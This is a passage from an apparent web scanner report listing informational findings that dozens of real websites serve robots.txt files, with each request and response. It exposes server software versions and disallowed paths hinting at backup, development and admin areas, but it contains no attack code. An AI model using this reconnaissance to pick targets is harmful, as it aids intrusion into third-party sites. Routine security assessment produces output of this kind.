Content-Location: http://www.realcareeradvice.com/robots.txt
Last-Modified: Thu, 10 Jun 2010 14:00:16 GMT
Accept-Ranges: bytes
ETag: "e3fc3941a58cb1:2ba86"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:32:09 GMT
Connection: close

User-agent: *
Disallow: /

27.1347. http://www.realestateone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realestateone.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realestateone.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:11 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) mod_jk/1.2.14 PHP/4.4.0-1
Last-Modified: Fri, 19 Feb 2010 22:28:47 GMT
ETag: "538cc-18-9b5e25c0"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Content-Type: text/plain
Via: 1.0 www.realestateone.com
Connection: close

User-agent: *
Allow: /


27.1348. http://www.realhaunts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realhaunts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realhaunts.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:42:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 30 Dec 2010 14:58:19 GMT
ETag: "3bd6e-cc-498a1ea8b58c0"
Accept-Ranges: bytes
Content-Length: 204
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-includes/
Disallow: /wp-content/themes/
Disallow: /wp-content/plugins/
Disallow: /wp-content/cache/
Disallow: /feed/
Disallow: /trackback/
Disallow: /r
...[SNIP]...

27.1349. http://www.realping.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realping.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realping.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 14 Feb 2006 15:08:54 GMT
ETag: "1af0006-1a1-40cc292dd2d80"
Accept-Ranges: bytes
Content-Length: 417
Connection: close
Content-Type: text/plain; charset=UTF-8

#
# robots.txt for http://www.realping.com/
#
# $Id: robots.txt,v 1.21 2002/03/04 10:35:35 dom Exp $
#

User-agent: W3Crobot/1
Disallow: /Out-Of-Date

# AltaVista Search
User-agent: AltaVista Intranet
...[SNIP]...

27.1350. http://www.realwebaudio.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realwebaudio.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realwebaudio.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:27:00 GMT
Server: Apache
Last-Modified: Thu, 09 Dec 2004 21:27:55 GMT
ETag: "82dffcd-220-82e34cc0"
Accept-Ranges: bytes
Content-Length: 544
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /A.html
Disallow: /B.html
Disallow: /C.html
Disallow: /D.html
Disallow: /E.html
Disallow: /F.html
Disallow: /G.html
Disallow: /H.html
Disallow: /I.html
Disa
...[SNIP]...

27.1351. http://www.realzionistnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realzionistnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realzionistnews.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:44:43 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Wed, 29 Apr 2009 20:34:37 GMT
ETag: "21a85bb-32-468b7820c7140"
Accept-Ranges: bytes
Content-Length: 50
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /cgi-bin/
Disallow: /tmp/

27.1352. http://www.rebubbled.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rebubbled.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rebubbled.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:54 GMT
Server: Apache
Last-Modified: Fri, 05 Feb 2010 20:07:54 GMT
ETag: "18eca48-16-47ee001c05a80"
Accept-Ranges: bytes
Content-Length: 22
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /

27.1353. http://www.recreationparks.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recreationparks.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.recreationparks.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:26:58 GMT
Server: Apache/2.2.9 (Debian) Phusion_Passenger/3.0.0
Last-Modified: Sat, 30 Oct 2010 23:13:19 GMT
ETag: "214086-4b-493ddb87b81c0"
Accept-Ranges: bytes
Content-Length: 75
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /
Sitemap: http://www.recreationparks.net/sitemap.xml

27.1354. http://www.recruitadvantage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.recruitadvantage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.recruitadvantage.com

Response

HTTP/1.1 200 OK
Content-Length: 980
Content-Type: text/plain
Content-Location: http://www.recruitadvantage.com/robots.txt
Last-Modified: Wed, 19 Aug 2009 20:06:46 GMT
Accept-Ranges: bytes
ETag: "0376294821ca1:c4ad"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:39:55 GMT
Connection: close

User-agent: *
Sitemap: http://www.turborecruit.com/sitemap.xml

User-Agent: *
Disallow: /company/index.cfm
Disallow: /company/How_to_contact_us_about_our_company.cfm
Disallow: /company/recruitme
...[SNIP]...

27.1355. http://www.redcarpet-fashionawards.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redcarpet-fashionawards.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redcarpet-fashionawards.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:53 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
X-Pingback: http://www.redcarpet-fashionawards.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=de77fe3535540ec7381ff5d03ddb3886; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.redcarpet-fashionawards.com/sitemap.xml.gz

27.1356. http://www.redrocklasvegas.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redrocklasvegas.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redrocklasvegas.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:03 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Content-Length: 463
Cache-Control: max-age=1209600
Expires: Fri, 03 May 2013 01:59:03 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

Sitemap: http://www.redrocklasvegas.com/sitemap.xml

User-agent: *
Disallow: /a3.old/
Disallow: /app1/
Disallow: /backup/
Disallow: /beta/
Disallow: /cert/
Disallow: /dev/
Disallow: /filedrop/
Disallo
...[SNIP]...

27.1357. http://www.reevoo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reevoo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reevoo.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=NUWIZXSrev3CKIOJ; domain=reevoo.com; path=/
Date: Wed, 04 May 2011 03:03:39 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 27 Apr 2011 14:47:08 GMT
ETag: "314"
Accept-Ranges: bytes
Content-Length: 788
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.reevoo.com/sitemap_index.xml

# pretty ruthless indexing, known pest
User-agent: Gigabot
Disallow: /

# DoCoMo are a Japanese telecoms company, I fear they may be taking liberties

...[SNIP]...

27.1358. http://www.reflector.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reflector.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reflector.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 03:29:09 GMT
Content-Type: text/plain
Connection: close
Vary: Accept-Encoding
Content-Length: 28
Last-Modified: Sat, 23 Apr 2011 00:43:56 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

#User-agent: *
#Disallow: /

27.1359. http://www.reformer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reformer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reformer.com

Response

HTTP/1.0 200 OK
Content-Length: 115
Content-Type: text/plain
Last-Modified: Wed, 05 Aug 2009 22:15:36 GMT
Accept-Ranges: bytes
ETag: "074a8411a16ca1:3044"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Expires: Wed, 04 May 2011 01:31:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:31:44 GMT
Connection: close

User-agent: *
Disallow: /portlet/
Disallow: /circare/
Crawl-delay: 5

Sitemap: http://www.reformer.com/sitemap.xml

27.1360. http://www.regent.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regent.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.regent.edu

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 04 May 2011 00:42:49 GMT
Content-length: 1446
Content-type: text/plain
Last-modified: Tue, 30 Nov 2010 16:26:55 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /1test/
Disallow: /acad/schdiv/assets/
Disallow: /acad/schedu/oldsite/
Disallow: /acad/schgov/cadips/
Disallow: /acad/schlaw/OLD/
Disallow: /acad/undergrad/faculty/
Disa
...[SNIP]...

27.1361. http://www.rejuvenation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rejuvenation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rejuvenation.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:43:36 GMT
Server: Apache/2.2.16 (Debian) PHP/5.3.3-7+squeeze1 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o
X-Powered-By: PHP/5.3.3-7+squeeze1
Vary: Accept-Encoding
Content-Length: 399
Connection: close
Content-Type: text/plain; charset=ISO-8859-1


# they DDoSed us once with poor throttling
User-agent: Charlotte
Disallow: /

# most spiders cannot handle wildcarded paths
User-agent: googlebot
Disallow: *gclid=*
Disallow: *ipb=*

# the general ar
...[SNIP]...

27.1362. http://www.relationships-blog.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.relationships-blog.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.relationships-blog.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:23:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://RELATIONSHIPS-BLOG.NET/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://RELATIONSHIPS-BLOG.NET/sitemap.xml.gz

27.1363. http://www.relieve-migraine-headache.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.relieve-migraine-headache.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.relieve-migraine-headache.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:48:41 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.relieve-migraine-headache.com/dqbgX8b2.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disal
...[SNIP]...

27.1364. http://www.rememberthemilk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rememberthemilk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rememberthemilk.com

Response

HTTP/1.1 200 OK
Server: nginx/RTM
Date: Wed, 04 May 2011 00:56:44 GMT
Content-Type: text/plain; charset=UTF-8
Last-Modified: Fri, 25 Mar 2011 01:00:50 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

User-agent: *
Disallow: /help/nopublished.rtm

User-agent: Gigabot
Disallow: /

User-agent: *
Disallow: /home

User-agent: *
Disallow: /ctd.rtm

27.1365. http://www.remingtonsociety.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.remingtonsociety.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.remingtonsociety.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:15:58 GMT
Server: Apache
Last-Modified: Wed, 26 Jan 2011 12:32:43 GMT
ETag: "11f2b58-80-49abf078db0c0"
Accept-Ranges: bytes
Content-Length: 128
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /journalsDB/

User-Agent: Googlebot
Disallow: /journalsDB/


27.1366. http://www.renewalbyandersen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.renewalbyandersen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.renewalbyandersen.com

Response

HTTP/1.1 200 OK
Content-Length: 29
Content-Type: text/plain
Last-Modified: Fri, 27 Jun 2008 15:17:00 GMT
Accept-Ranges: bytes
ETag: "0fe77d868d8c81:834"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:20:19 GMT
Connection: close

User-Agent: *
Disallow: /bin

27.1367. http://www.rentometer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rentometer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rentometer.com

Response

HTTP/1.1 200 OK
Server: nginx/0.5.35
Date: Wed, 04 May 2011 03:24:15 GMT
Content-Type: text/plain
Content-Length: 146
Last-Modified: Tue, 19 Apr 2011 22:50:23 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
Accept-Ranges: bytes

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: *
Disallow: /rentometer/compare/


27.1368. http://www.restaurantrow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.restaurantrow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.restaurantrow.com

Response

HTTP/1.1 200 OK
Content-Length: 525
Content-Type: text/plain
Content-Location: http://www.restaurantrow.com/robots.txt
Last-Modified: Tue, 11 Aug 2009 21:57:03 GMT
Accept-Ranges: bytes
ETag: "c66633a9ce1aca1:14d7"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:32:38 GMT
Connection: close

User-agent: Mediapartners-Google *
Disallow: /upcontrol
Disallow: /images
Disallow: /rownet
Disallow: /adtracker
Disallow: /ads
Disallow: /mapy.cfm
Disallow: /mapping.cfm
Disallow: /op
...[SNIP]...

27.1369. http://www.resumesstarthere.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resumesstarthere.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.resumesstarthere.com

Response

HTTP/1.1 200 OK
Content-Length: 48
Content-Type: text/plain
Last-Modified: Thu, 04 Jun 2009 06:25:23 GMT
Accept-Ranges: bytes
ETag: "2e99213edde4c91:2c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:43:42 GMT
Connection: close

User-Agent: *
Disallow: /ma/flash
Allow: /


27.1370. http://www.retailsaveronline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.retailsaveronline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.retailsaveronline.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 18 Nov 2010 15:43:25 GMT
Accept-Ranges: bytes
ETag: "aeb370563787cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:14:12 GMT
Connection: close
Content-Length: 253

###############################
#
#
User-agent: *
#
# list folders robots are not allowed to index
#
Disallow: /
#
# list specific files robots are not allowed to index
#
#Disallow: /direc
...[SNIP]...

27.1371. http://www.reversecellphones.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reversecellphones.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reversecellphones.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:33:40 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 03 Sep 2010 19:22:00 GMT
ETag: "8e1005d-21-48f5fd8466600"
Accept-Ranges: bytes
Content-Length: 33
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /jump.php

27.1372. http://www.rhinomart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rhinomart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rhinomart.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:18:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.2
Last-Modified: Mon, 20 Dec 2010 17:10:39 GMT
ETag: "4cf0007-aa-497da996461c0"
Accept-Ranges: bytes
Content-Length: 170
Connection: close
Content-Type: text/plain

Sitemap: http://www.rhinomart.com/sitemapindex.xml
User-agent:*
Disallow: /catalog/
Disallow: /fet38xH623/
Disallow: /fet38xH623/fetchbackFeed.csv
Disallow: /rhinovault/

27.1373. http://www.richland.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.richland.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.richland.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:41:33 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 06 Sep 2010 10:37:16 GMT
ETag: "7801986e-624-48f94dd34cf00"
Accept-Ranges: bytes
Content-Length: 1572
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.1374. http://www.ridemonkey.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ridemonkey.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ridemonkey.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:48:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 23 Jun 2009 13:35:44 GMT
ETag: "34e82a6-33-46d041146ec00"
Accept-Ranges: bytes
Content-Length: 51
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /forums/admincp/


27.1375. http://www.ridgelineownersclub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ridgelineownersclub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ridgelineownersclub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:04:37 GMT
Server: Apache
Last-Modified: Sat, 29 Apr 2006 19:56:45 GMT
Accept-Ranges: bytes
Content-Length: 903
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# Honda Ridgeline Owners Club -- http://www.ridgelineownersclub.com
# Robot Exclusion File -- robots.txt
# Author: T Mac
# Last Updated: 04/25/06

User-agent: *
Crawl-delay: 20
Disallow: /forums/att
...[SNIP]...

27.1376. http://www.rightnowautoparts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rightnowautoparts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rightnowautoparts.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 00:59:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1593
Content-type: text/html

User-agent: dotbot
Disallow: /

User-agent: MJ12bot
Disallow: /

User-agent:*
Disallow: /images/
Disallow: /itemimages/
Disallow: /Iif/
Disallow: /iif/
Disallow: /Data/
Disallow: /webstor
...[SNIP]...

27.1377. http://www.rigpix.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rigpix.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rigpix.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:05:03 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Sun, 24 Jan 2010 06:25:52 GMT
ETag: "264ea2-8b-47de31fd5dc00"
Accept-Ranges: bytes
Content-Length: 139
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /*.gif$

User-Agent: *
Disallow: /*.jpg$

User-Agent: *
Disallow: /*.pdf$

User-Agent: Googlebot-Image
Disallow: /

27.1378. http://www.ringling.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ringling.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ringling.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 18 Jun 2010 18:38:47 GMT
Accept-Ranges: bytes
ETag: "41beb97c15fcb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:18:19 GMT
Connection: close
Content-Length: 1924

...User-agent: *
Disallow: /explore
Disallow: /general
Disallow: /dlarible
Disallow: /137star
Disallow: /138star
Disallow: /clicked
Disallow: /hometown
Disallow: /GL02media
Disallow: /MediaGu
...[SNIP]...

27.1379. http://www.rinmarugames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rinmarugames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rinmarugames.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:08:51 GMT
Server: Apache
Last-Modified: Sun, 13 Jun 2010 16:47:50 GMT
Accept-Ranges: bytes
Content-Length: 974
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /DecoraGame.html
Allow: /alldolls.php
Disallow: /NarutoDoll.html
Disallow: /horoscope.php?page=cancer
Disallow: /index.html
Disallow: /AllDolls.html
Disallow: /MiyaviDoll.html

...[SNIP]...

27.1380. http://www.rismedia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rismedia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rismedia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Jan 2011 20:34:49 GMT
ETag: "522263-bc-49b2a58e24c40"
Accept-Ranges: bytes
Content-Length: 188
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-content/plugins/
Disallow: /wp-content/themes/

User-agent: BLP_bbot
Disallow: /

User-agent: BLP_bbot/0.1
Disallow: /

Sitemap: http://rismedia.com/posts.xml


27.1381. http://www.rissyroos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rissyroos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rissyroos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:10:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 13 Jan 2011 05:43:35 GMT
ETag: "15a000d-56-499b3cc710fc0"
Accept-Ranges: bytes
Content-Length: 86
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 60

User-agent: likebot*
Crawl-delay: 60
Disallow: /

27.1382. http://www.robertbauval.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.robertbauval.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.robertbauval.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:13:04 GMT
Server: Apache
Last-Modified: Sun, 05 Mar 2006 22:18:41 GMT
ETag: "b36ae171-224d-440b63c1"
Accept-Ranges: bytes
Content-Length: 8781
Connection: close
Content-Type: text/plain

User-agent: Mozilla/3.0 (compatible;miner;mailto:miner@miner.com.br)
Disallow:

User-agent: WebFerret
Disallow:

User-agent: Due to a deficiency in Java it's not currently possible
to set the
...[SNIP]...

27.1383. http://www.rockbet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockbet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rockbet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:04:49 GMT
Server: Apache
Last-Modified: Wed, 14 Jul 2010 21:31:44 GMT
Accept-Ranges: bytes
Content-Length: 54
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /global.php
Disallow: /signup/

27.1384. http://www.rockstaruproar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rockstaruproar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rockstaruproar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:27:23 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 03 May 2010 02:35:55 GMT
ETag: "33145d-130-485a773c278c0"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

27.1385. http://www.rogershelp.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rogershelp.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rogershelp.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:00:36 GMT
Server: Apache
